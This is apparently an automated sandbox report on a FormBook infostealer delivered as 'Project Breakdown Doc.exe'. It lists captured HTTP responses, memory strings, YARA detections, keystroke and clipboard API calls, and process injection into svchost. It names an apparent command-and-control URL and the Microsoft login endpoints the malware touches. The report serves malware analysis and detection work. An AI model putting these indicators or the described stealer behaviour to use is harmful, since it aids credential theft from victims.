43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 11:42:37 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 22 Nov 2024 11:42:39 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 22 Nov 2024 11:43:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 22 Nov 2024 11:43:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Fri, 22 Nov 2024 11:43:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: VFfhzkOtKq.exe, 00000007.00000002.2938680835.0000000004CFA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wine-drinkers.club
                Source: VFfhzkOtKq.exe, 00000007.00000002.2938680835.0000000004CFA000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wine-drinkers.club/hakt/
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powercfg.exe, 00000006.00000002.2937780821.0000000004408000.00000004.10000000.00040000.00000000.sdmp, powercfg.exe, 00000006.00000002.2939443430.0000000006790000.00000004.00000800.00020000.00000000.sdmp, VFfhzkOtKq.exe, 00000007.00000002.2937216362.0000000002F78000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://kb.fastpanel.direct/troubleshoot/
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: powercfg.exe, 00000006.00000002.2935230373.0000000002F1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: powercfg.exe, 00000006.00000003.2452967426.00000000081F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: powercfg.exe, 00000006.00000003.2464503934.000000000821E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CB425A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB4458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00CB4458
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CB425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00CB425A
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CA0219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00CA0219
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: 0_2_00CCCDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00CCCDAC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.2936457400.00000000032F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259560056.0000000003960000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2938680835.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2259200561.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2260126536.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2936946828.0000000003450000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2936746920.0000000003470000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.2935024128.0000000000D20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\Project Breakdown Doc.exeCode function: This is a third-party compiled AutoIt script.0_2_00C43B4C
                Source: Project Breakdown Doc.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Project Breakdown Doc.exe, 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_761de984-0
                Source: Project Breakdown Doc.exe, 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f72e6896-b
                Source: Project Breakdown Doc.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_95724fa1-4
                Source: Project Breakdown Doc.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0395a16b-9
                Uses powercfg.exe to modify the power settings
                Source: C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exeProcess created: C:\Windows\SysWOW64\powercfg.exe "C:\Windows\SysWOW64\powercfg.exe"
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042CD33 NtClose,1_2_0042CD33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B60 NtClose,LdrInitializeThunk,1_2_03B72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03B72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk,1_2_03B735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74340 NtSetContextThread,1_2_03B74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B74650 NtSuspendThread,1_2_03B74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BA0 NtEnumerateValueKey,1_2_03B72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72B80 NtQueryInformationFile,1_2_03B72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BF0 NtAllocateVirtualMemory,1_2_03B72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72BE0 NtQueryValueKey,1_2_03B72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AB0 NtWaitForSingleObject,1_2_03B72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AF0 NtWriteFile,1_2_03B72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72AD0 NtReadFile,1_2_03B72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FB0 NtResumeThread,1_2_03B72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FA0 NtQuerySection,1_2_03B72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F90 NtProtectVirtualMemory,1_2_03B72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72FE0 NtCreateFile,1_2_03B72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72F30 NtCreateSection,1_2_03B72F30
